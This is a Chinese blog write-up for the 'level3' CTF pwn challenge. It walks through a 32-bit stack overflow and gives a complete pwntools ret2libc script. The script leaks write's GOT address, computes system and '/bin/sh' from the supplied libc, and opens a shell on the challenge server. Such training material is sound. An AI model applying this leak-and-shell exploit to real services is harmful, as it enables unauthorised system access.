level3的wp

最新推荐文章于 2022-06-18 22:14:07 发布
最新推荐文章于 2022-06-18 22:14:07 发布
阅读量301 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/113045632
版权

level3

用Linux康康,这是个压缩文件啊,解压康康
在这里插入图片描述
居然是个libc,有意思
先康康level3,是个32位,没有金丝雀
在这里插入图片描述
给了个buf,康康堆栈
在这里插入图片描述
可溢出,但是我们发现没有system函数,但是我们有libc
可以通过libc泄露system函数地址,虽然与原文件地址不一样,但是libc的write函数和system函数之间的地址差是一样的
写脚本

#导入pwn模块
from pwn import *

#获取远程进程对象
p=remote('111.198.29.45',41496)

#获取本地进程对象
#p = process("./level3/level3")

#获取文件对象
elf=ELF('./level3/level3')

#获取lib库对象
libc = ELF('./level3/libc_32.so.6')

#获取函数
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']

#接收数据
p.recvuntil(":\n")

#char[88] ebp  write函数地址  write函数返回地址(返回到main函数)  write函数参数一(1)  write函数参数二(write_got地址)  write函数参数三(写4字节)
payload=0x88*'a'+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)

p.sendline(payload)

#获取write在got中的地址
write_got_addr=u32(p.recv())
print hex(write_got_addr)

#计算lib库加载基址
libc_base=write_got_addr-libc.sym['write']
#输出打包
print hex(libc_base)

#计算system的地址
system_addr = libc_base+libc.sym['system']
print hex(system_addr)

#计算字符串 /bin/sh 的地址。0x15902b为偏移,通过命令:strings -a -t x libc_32.so.6 | grep "/bin/sh" 获取
bin_sh_addr = libc_base + 0x15902b
print hex(bin_sh_addr)

#char[88] ebp system system函数的返回地址 system函数的参数(bin_sh_addr)
payload2=0x88*'a'+p32(0xdeadbeef)+p32(system_addr)+p32(0x11111111)+p32(bin_sh_addr)

#接收数据
p.recvuntil(":\n")

#发送payload
p.sendline(payload2)

#切换交互模式
p.interactive()
w0nderMaker
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF|pwn栈溢出入门题level3解题思路及个人总结
skyattractive的博客
06-02 2293
CTF|pwn栈溢出入门题level3解题思路及个人总结 解题思路 拿到题目将文件下载下来拖入ubuntu 发现这一次的文件比较特殊:是一个linux环境下的压缩包,自然而然想到的是解压它 通过命令行tar -xvf level.tar 将其解压出来 发现有两个文件:level和libc 都拖入IDA 特殊的地方在:本题没有直接给出system和bin/sh的位置,但是文件中有个write函数可以利用 我们IDA打开libc文件(关于libc文件是什么有什么 会在总结写到) 总体思路为:我们通过r
level3
qq_44832048的博客
07-26 2304
level 3 在终端中输入file level3 查看为32位, checksec level3命令,发现栈是不受保护, 在IDA中查看伪代码, 很明显的栈溢出漏洞,但是没有system函数和/bin/sh字符串,只有一个write函数,泄露函数got表中的地址获取到库中某个函数的真正加载地址,通过偏移找出函数的库,通过然后找出其他函数的真正加载地址,包括system函数也包括...
[攻防世界]level3
逆向萌新的博客
06-18 368
[攻防世界]level3,详细
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1437
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
Jarvis OJ-PWN-[XMAN]level3 wp
分不清东西南北的Laffey
10-15 686
地址:nc pwn2.jarvisoj.com 9879 一开始拿到题目的时候是一个rar文件 解压后就得到了两个文件 对这两个文件查看保护 两个文件都是32位的 level3没有开启栈保护 可以利用栈溢出;栈中内容不可使用 不用shellcode libc-2.19.so可以看到是全部都开启了 用IDA32打开level3 跟进vulnerable_function()函数 溢出点在r...
攻防世界Level3
WangLal的博客
07-05 296
攻防世界PWN新手题 level3的WP 基本三步:checksec,file,执行文件 只开了NX防护,且是个32位的文件 放进IDA中查看 main函数中只调用了一个函数,vulnerable_function(),进入函数中查看 发现read函数可以制造栈溢出漏洞。 要注意,题目还给了一个库,level3的文件中没有System函数,所以只能调用库中的函数。同时,文件PIE没开代表libc中函数的编移量就是固定的,只要确认了libc的基址,然后计算出system函数的offset,就可以定位到s
WP8.1安全概述
06-26
The result is a feature-rich, flexible smartphone that uses a holistic approach to security design—a breakthrough for enterprises that need smartphones capable of enterprise-level security, features...
WP8 地图示例
12-17
ZoomLevel属性则用来调整地图的缩放级别。示例可能还会展示如何通过TileSource添加自定义图层,例如叠加卫星图像或自定义数据。 地理位置服务在WP8中通过Geolocator类实现,允许应用获取设备的当前位置。开发者可以...
WP连接器
02-13
3. **自动化工作流程**:WP连接器可以定义和执行一系列自动化任务,比如当用户注册时自动发送邮件,或者在新文章发布后更新社交媒体状态。 4. **自定义功能扩展**:根据业务需求,开发者可以通过WP连接器扩展...
bubble-level-wp:Bubble Level 是一个简单的 Windows Phone 示例应用程序,演示了使用加速度计传感器来计算设备的倾斜度,并将其呈现为传统的气泡水平仪
07-10
BubbleLevel Silverlight 示例BubbleLevel Silverlight 是一个简单的 WP7 Silverlight 应用程序,它使用加速度计传感器信息来计算设备的倾斜度,并将其呈现为传统的气泡级别。 该应用程序提供校准功能来处理加速度计...
D3D+windowsPhone
05-21
6. **Shader Model**: 了解如何编写和使用HLSL(High-Level Shader Language)的顶点着色器、像素着色器和其他类型的shader,以便控制3D物体的形状、颜色、光照等视觉效果。 7. **性能优化**: 移动设备上的资源有限...
jarvisoj的pwn中level系列wp
Huiuyao的博客
12-09 2796
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
UiPath Level3讲解
liutao261311的博客
09-12 2679
Uipath中文社区qq交流群:4656303241 第一课–UiPath Level3 框架讲解 https://ke.qq.com/course/443058?taid=3645267593577138 第二课–UiPath Level3 案例1的讲解 https://ke.qq.com/course/443163?taid=3761240300503835 ...
攻防世界 pwn level3
Bsecure的博客
06-06 1008
level3 开始查保护后没注意到NX,在栈上几次没执行成功才回去看到。这个题实际还是栈溢出,但多考了很多知识点,对刚接触pwn收获还是很大。 首先查保护,只开了NX,没有canary,那就可以往靠溢出控制程序走向了的方向看题。 载入ida后,栈溢出很明显。 但利用起来,既没有有system函数,也没有’/bin/sh’。这对于刚接触pwn还是比较困难的,但本来就学习的过程,看了writeup又去学了下.plt与.got再来做的题。 其实程序带了一个运行库的,里面有动态链接库的函数
joj level 3 wp
qq_35927490的博客
11-24 124
思路:标准的 ret2libc,先通过 rop 控制 puts 出某个 GOT 中的地址以找到 libc 的基址,有了 libc 的基地址后,libc 中的所有函数和字符串的地址就知道了,构造一个 system(“/bin/sh”) 的函数调用栈即可 from pwn import * #conn=process(’./level3’) conn=remote(“pwn2.jarvisoj.com...
wp/wordpress分享到微信/QQ…代码
QUX轻博客
08-08 8583
wp主题分享功能非常常见和重要,那么作为主题开发者,主题里面怎么加入分享代码呢?这里我们用的百度分享代码,你如果不是太熟悉可以先看看《百度分享插件,可分享到QQ,微信...
流利说 Level 3 全文
热门推荐
怀素的专栏
05-22 3万+
Level 3 Unit1 1/4 Listening Lesson 1 An Unusual Day Lesson 2 Bus Schedule Vocabulary Lesson 3 Activities &Food Lesson 4 Spatial Relations Dialogue Lesson 5 Meeting at the Airport Lesson...
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1651
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
oj 中level3 (普通栈溢出32位)
weixin_44954083的博客
07-14 278
查看文件信息,安全机制 代码审计 分析漏洞点 编写EXP 一道题出来,先看一下保护机制, 由于你道题是nx是保护的, 拉进入ida看一下,明显这道题是栈的溢出 这道题们没有system 函数,和binsh 其实这道题没有这些,我们可以在泄露函数got表函数的真正加载地址,通过偏移找出函数的库,从而通过找其他函数的真正加载地址,找到system 函数和 binsh字符串·, 开了nx保护 所...
出错 Untitled (line 14) [wp,~] = wpdec(x,level,wname);
最新发布
05-30
这个错误通常是由于没有正确安装信号处理工具箱或者没有将其添加到MATLAB路径中导致的。请确保已正确安装信号处理工具箱,并使用以下命令将其添加到MATLAB路径中: ``` addpath(genpath('toolbox_path/signal')) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值